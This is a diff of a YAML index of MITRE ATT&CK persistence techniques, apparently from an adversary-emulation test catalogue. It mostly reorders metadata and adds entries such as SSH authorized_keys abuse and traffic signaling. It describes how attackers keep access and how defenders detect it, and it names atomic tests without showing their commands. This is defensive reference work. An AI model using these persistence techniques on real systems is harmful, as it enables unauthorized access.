+ Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
+
+ If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
+
+ For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ - Office 365
+ - SaaS
+ - Azure AD
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_contributors:
+ - Praetorian
atomic_tests: []
T1547.001:
technique:
@@ -13682,22 +13909,22 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T16:16:26.182Z'
created: '2020-01-23T22:02:48.566Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ x_mitre_platforms:
+ - Windows
identifier: T1547.001
atomic_tests:
- name: Reg Key Run
@@ -13884,24 +14111,77 @@ persistence:
phase_name: persistence
modified: '2020-03-25T23:30:20.638Z'
created: '2019-12-12T14:59:58.168Z'
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
- NetSPI Startup Stored Procedures) Consider enabling audit features that can
- log malicious startup activities.'
+ x_mitre_data_sources:
+ - Application logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- SYSTEM
- root
- x_mitre_is_subtechnique: true
+ x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
+ NetSPI Startup Stored Procedures) Consider enabling audit features that can
+ log malicious startup activities.'
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ atomic_tests: []
+ T1098.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1098.004
+ url: https://attack.mitre.org/techniques/T1098/004
+ - source_name: SSH Authorized Keys
+ url: https://www.ssh.com/ssh/authorized_keys/
+ description: ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June
+ 24, 2020.
+ - source_name: Venafi SSH Key Abuse
+ url: https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities
+ description: 'Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity
+ Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24,
+ 2020.'
+ - source_name: Cybereason Linux Exim Worm
+ url: https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability
+ description: Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting
+ Linux Exim Server Vulnerability. Retrieved June 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: SSH Authorized Keys
+ description: |-
+ Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
+
+ Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)
+ id: attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ modified: '2020-06-25T16:32:23.367Z'
+ created: '2020-06-24T12:42:35.144Z'
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.
+
+ Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.
x_mitre_data_sources:
- - Application logs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Tony Lambert, Red Canary
+ x_mitre_platforms:
+ - Linux
+ - macOS
atomic_tests: []
T1053.005:
technique:
@@ -13950,13 +14230,11 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:03.730Z'
created: '2019-11-27T14:58:00.429Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -13972,11 +14250,13 @@ persistence:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -14115,19 +14395,18 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:04.006Z'
created: '2017-05-31T21:30:46.977Z'
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_remote_support: true
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -14138,18 +14417,19 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_remote_support: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
atomic_tests: []
T1546.002:
technique:
@@ -14189,23 +14469,23 @@ persistence:
phase_name: persistence
modified: '2020-03-23T12:23:04.955Z'
created: '2020-01-24T13:51:01.210Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Bartosz Jerzman
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
+
+ Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
x_mitre_data_sources:
- File monitoring
- Windows Registry
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
-
- Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Bartosz Jerzman
+ x_mitre_platforms:
+ - Windows
identifier: T1546.002
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
@@ -14263,22 +14543,22 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T15:42:48.910Z'
created: '2020-01-24T17:16:11.806Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - DLL monitoring
- - Windows Registry
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys.
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012
R2 may generate events when unsigned SSP DLLs try to load into the LSA by
setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber
2014) (Citation: Microsoft Configure LSA)'
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Windows Registry
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
identifier: T1547.005
atomic_tests:
- name: Modify SSP configuration in registry
@@ -14329,8 +14609,23 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-25T23:30:20.871Z'
+ modified: '2020-04-17T17:47:57.075Z'
created: '2019-06-28T17:52:07.296Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Process monitoring
+ - File monitoring
+ - Application logs
x_mitre_detection: "Consider monitoring application logs for abnormal behavior
that may indicate suspicious installation of application software components.
Consider monitoring file locations associated with the installation of new
@@ -14340,21 +14635,6 @@ persistence:
or accessing files. Log authentication attempts to the server and any unusual
traffic patterns to or from the server and internal network. (Citation: US-CERT
Alert TA15-314A Web Shells) "
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Process monitoring
- - File monitoring
- - Application logs
- x_mitre_version: '1.1'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_is_subtechnique: false
atomic_tests: []
T1574.010:
technique:
@@ -14384,8 +14664,22 @@ persistence:
phase_name: defense-evasion
modified: '2020-03-26T19:37:28.912Z'
created: '2020-03-12T20:43:53.998Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Services
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: "Look for changes to binaries and service executables that
may normally occur during software updates. If an executable is written, renamed,
and/or moved to match an existing service executable, it could be detected
@@ -14394,22 +14688,8 @@ persistence:
for abnormal process call trees from typical processes and services and for
execution of other commands that could relate to Discovery or other adversary
techniques. "
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process command-line parameters
- - Services
- - File monitoring
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
identifier: T1574.010
atomic_tests:
- name: File System Permissions Weakness
@@ -14514,32 +14794,32 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:43:33.981Z'
+ modified: '2020-06-20T22:01:09.906Z'
created: '2020-03-13T11:42:14.444Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Windows Registry
- - Services
- - Process command-line parameters
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Process whitelisting
+ x_mitre_data_sources:
+ - Windows Registry
+ - Services
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -14585,25 +14865,25 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T17:21:27.487Z'
created: '2020-01-24T19:00:32.917Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Since a shortcut's target path likely will not change, modifications
to shortcut files that do not correlate with known software changes, patches,
removal, etc., may be suspicious. Analysis should attempt to relate shortcut
file change or creation events to other potentially suspicious events based
on known adversary behavior such as process launches of unknown executables
that make network connections.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
@@ -14699,19 +14979,19 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T23:47:39.124Z'
created: '2020-01-15T18:00:33.603Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
x_mitre_detection: |-
The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.005
atomic_tests:
- name: Add file to Local Library StartupItems
@@ -14785,30 +15065,31 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-23T23:50:48.027Z'
+ modified: '2020-05-19T21:22:37.865Z'
created: '2019-12-19T19:43:34.507Z'
- x_mitre_defense_bypassed:
- - Host intrusion prevention systems
- - Anti-virus
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_detection: |-
- System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
-
- Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Jean-Ian Boutin, ESET
+ - McAfee
+ - Ryan Becwar
x_mitre_data_sources:
- EFI
- BIOS
- API monitoring
- x_mitre_contributors:
- - McAfee
- - Ryan Becwar
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
+
+ Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Host intrusion prevention systems
+ - Anti-virus
+ - File monitoring
atomic_tests: []
T1543.002:
technique:
@@ -14886,25 +15167,25 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T22:13:59.473Z'
created: '2020-01-17T16:15:19.870Z'
- x_mitre_contributors:
- - Tony Lambert, Red Canary
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - root
+ x_mitre_platforms:
+ - Linux
x_mitre_detection: |-
Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.
- x_mitre_platforms:
- - Linux
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Tony Lambert, Red Canary
identifier: T1543.002
atomic_tests:
- name: Create Systemd Service
@@ -15017,10 +15298,15 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T15:24:26.476Z'
created: '2020-01-24T15:51:52.317Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Scott Lundgren, @5twenty9, Carbon Black
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
+ x_mitre_detection: |-
+ Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
+
+ The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)
x_mitre_data_sources:
- API monitoring
- Binary file metadata
@@ -15028,37 +15314,33 @@ persistence:
- File monitoring
- Loaded DLLs
- Process monitoring
- x_mitre_detection: |-
- Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
-
- The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Scott Lundgren, @5twenty9, Carbon Black
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
- T1545:
+ T1205:
technique:
+ revoked: false
+ id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Traffic Signaling
+ description: |-
+ Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
+
+ Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
+
+ The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
external_references:
- source_name: mitre-attack
- external_id: T1545
- url: https://attack.mitre.org/techniques/T1545
+ external_id: T1205
+ url: https://attack.mitre.org/techniques/T1205
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Traffic Signaling
- description: |-
- Adversaries may use traffic signaling to hide open ports used for persistence or command and control. Traffic signaling is a well-established method used by both defenders and adversaries to hide open ports from access/discovery. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1545/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
-
- This technique has been observed for both the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
-
- The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -15067,24 +15349,26 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T20:14:07.431Z'
- created: '2020-01-22T20:18:16.952Z'
+ modified: '2020-07-01T18:27:41.755Z'
+ created: '2018-04-18T17:59:24.739Z'
+ x_mitre_contributors:
+ - Josh Day, Gigamon
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- Linux
- macOS
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Packet capture
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_permissions_required:
- - User
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Josh Day, Gigamon
atomic_tests: []
T1505.002:
technique:
@@ -15129,26 +15413,26 @@ persistence:
phase_name: persistence
modified: '2020-03-25T22:59:59.124Z'
created: '2019-12-12T15:08:20.972Z'
- x_mitre_platforms:
- - Linux
- - Windows
- x_mitre_contributors:
- - ESET
- - " Christoffer Strömblad"
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Application logs
- - File monitoring
x_mitre_detection: Consider monitoring application logs for abnormal behavior
that may indicate suspicious installation of application software components.
Consider monitoring file locations associated with the installation of new
application software components such as paths from which applications typically
load such extensible components.
+ x_mitre_data_sources:
+ - Application logs
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
+ - root
+ x_mitre_contributors:
+ - ESET
+ - " Christoffer Strömblad"
+ x_mitre_platforms:
+ - Linux
+ - Windows
identifier: T1505.002
atomic_tests:
- name: Install MS Exchange Transport Agent Persistence
@@ -15218,22 +15502,22 @@ persistence:
phase_name: persistence
modified: '2020-03-24T16:43:02.273Z'
created: '2020-01-24T14:17:43.906Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: Trap commands must be registered for the shell or programs,
so they appear in files. Monitoring files for suspicious or overly broad trap
commands can narrow down suspicious behavior during an investigation. Monitor
for suspicious processes executed through trap interrupts.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1546.005
atomic_tests:
- name: Trap
@@ -15286,31 +15570,13 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.955Z'
+ modified: '2020-06-20T22:44:36.043Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Process whitelisting
- - System access controls
- - Anti-virus
- x_mitre_detection: |-
